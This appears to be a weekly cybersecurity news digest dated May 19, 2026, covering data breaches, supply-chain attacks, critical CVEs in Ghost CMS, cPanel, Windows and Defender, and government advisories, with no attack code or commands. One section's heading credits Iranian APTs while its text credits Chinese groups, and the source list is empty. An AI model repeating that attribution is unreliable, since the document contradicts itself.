Cybersecurity Week in Review: May 19, 2026

Overview

This week in cybersecurity was marked by a surge in high-profile data breaches, sophisticated cyberattacks leveraging both zero-day vulnerabilities and advanced social engineering, and a wave of critical vulnerability disclosures affecting widely used platforms. Government agencies and industry leaders responded with urgent advisories and rapid patching efforts, while the global cybersecurity community convened at major conferences to address the evolving threat landscape.

Major Data Breaches

GitHub Breach: 4,000+ Internal Repositories Exposed

GitHub, the world’s largest code hosting platform, confirmed a significant breach in which attackers accessed and exfiltrated over 4,000 internal repositories. The attack, attributed to the Team PCP ransomware group, exposed sensitive source code and internal documentation. GitHub has not disclosed the full extent of the data compromised, but the breach has raised concerns about the security of collaborative development environments and the potential for downstream supply chain attacks. The company is working with law enforcement and has urged users to review their own repository security settings1.

Foxconn Ransomware Attack: 8TB of Data Stolen

Foxconn’s North American facility was hit by the Nitrogen ransomware group, resulting in the theft of over 8 terabytes of data, including 11 million files with confidential information, internal project documentation, and technical drawings. The attackers have reportedly begun leaking samples of the stolen data to pressure the company into paying a ransom. This incident underscores the persistent targeting of manufacturing and supply chain organizations by ransomware operators1.

Canvas Data Breach: 9,000 Institutions Impacted

A massive breach of the Canvas learning management system affected nearly 9,000 educational institutions worldwide, including Harvard, Stanford, UC Berkeley, and the National University of Singapore. The ShinyHunters ransomware group is believed to be behind the attack, which exposed a range of personal and academic data. Investigations are ongoing to determine the full scope of the compromise1.

NVIDIA GeForce NOW Partner Breach

A partner of NVIDIA’s GeForce NOW cloud gaming service in Armenia suffered a breach attributed to the ShinyHunters group. The attackers accessed a user database containing names, email addresses, usernames, dates of birth, membership details, and two-factor authentication status. The quantity of data exposed is still under investigation1.

Significant Cyberattacks

GitHub Supply Chain Attack: Megalodon Campaign

Over 5,500 GitHub repositories were compromised in a large-scale supply chain attack dubbed “Megalodon.” Attackers used automated commits to inject malicious GitHub Actions workflows, potentially enabling code execution and data exfiltration across numerous open-source projects. The campaign highlights the growing risk of automated attacks on software supply chains2.

German Hospitals Targeted

A coordinated cyberattack targeted multiple hospitals in Germany, disrupting patient care and forcing some facilities to divert emergency cases. The attack vector and attribution remain under investigation, but early reports suggest ransomware was involved. The incident has prompted renewed calls for improved healthcare cybersecurity3.

Iranian APTs Target Central Asia Telecoms

Chinese APT groups were observed deploying Linux backdoors in attacks against telecommunications providers in Central Asia. These campaigns are part of a broader trend of state-sponsored cyber-espionage targeting critical infrastructure and communications networks4.

Critical Vulnerabilities

Ghost CMS CVE-2026-26980: 700+ Sites Hijacked

A critical SQL injection vulnerability (CVE-2026-26980, CVSS 9.4) in Ghost CMS was exploited to hijack over 700 websites. Attackers injected malicious JavaScript to facilitate “ClickFix” attacks, tricking users into executing payloads that could compromise their systems. The flaw allowed unauthenticated attackers to obtain admin API keys and modify site content. Ghost CMS users are urged to update to version 6.19.1 or later and audit for signs of compromise5.

cPanel CVE-2026-41940: Mass Exploitation and Ransomware

A critical authentication bypass in cPanel and WHM (CVE-2026-41940, CVSS 9.8) has been mass-exploited since February 2026. Attackers leveraged a CRLF injection flaw to gain root access, deploy “SORRY” ransomware, and conscript servers into Mirai botnets. Over 1.5 million internet-facing cPanel instances were at risk, with at least 44,000 confirmed compromises. Immediate patching and credential rotation are mandatory6.

Windows Zero-Days: YellowKey, GreenPlasma, MiniPlasma

A security researcher known as “Nightmare Eclipse” disclosed three new Windows zero-days:

YellowKey: Allows attackers with physical access to bypass BitLocker encryption using a USB device.
GreenPlasma: Enables local privilege escalation to SYSTEM on Windows 10/11 and Server.
MiniPlasma: Exploits a previously patched flaw (CVE-2020-17103) to gain full system control.

Microsoft is investigating and has patched some related vulnerabilities, but several remain unaddressed. Organizations are advised to implement application allowlisting and containment strategies7.

Microsoft Defender Exploits: CVE-2026-41091 and CVE-2026-45498

Two actively exploited vulnerabilities in Microsoft Defender were disclosed:

CVE-2026-41091 (CVSS 7.8): Privilege escalation via improper link resolution.
CVE-2026-45498 (CVSS 4.0): Denial-of-service bug.

Both have been patched in the latest Defender Antimalware Platform updates. CISA has added these to its Known Exploited Vulnerabilities catalog, requiring urgent remediation8.

Other Notable CVEs

CVE-2026-24207: NVIDIA Triton Inference Server authentication flaw (CVSS 9.8).
CVE-2026-8153: Universal Robots PolyScope 5 OS command injection.
CVE-2026-5281: Google Chrome Dawn use-after-free, exploited in the wild.

Government Responses

CISA and International Advisories

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued multiple alerts, adding new vulnerabilities to its Known Exploited Vulnerabilities catalog and setting federal remediation deadlines. CISA emphasized the need for rapid patching of cPanel, Windows, and Defender vulnerabilities, and highlighted the ongoing threat from ransomware and state-sponsored actors9.

Microsoft and Vendor Actions

Microsoft released out-of-band updates for Defender and is investigating the latest zero-day disclosures. Cisco, NVIDIA, and other vendors published advisories and patches for critical vulnerabilities affecting their products10.

Miscellaneous & Industry Events

Global Cybersecurity Conferences

The week saw a packed calendar of international cybersecurity conferences, including the World Conference on Cyber Security and Ethical Hacking (WCCSEH) in Kyoto and Macau, and the International Conference on Cybersecurity, Cybercrimes, and Smart Emerging Technologies (ICCCSET) in multiple global locations. These events focused on AI-driven threats, supply chain security, and the convergence of data protection and AI governance11.

AI and Vulnerability Discovery

Anthropic’s “Mythos” project and other AI-driven initiatives have accelerated the discovery of thousands of vulnerabilities across open-source projects, sparking debate about the balance between rapid disclosure and responsible remediation12.

Conclusion

This week’s developments highlight the relentless pace of cyber threats, the critical importance of rapid vulnerability management, and the need for coordinated industry and government responses. Organizations are urged to prioritize patching, enhance supply chain security, and stay informed through trusted advisories and professional events.

Sources: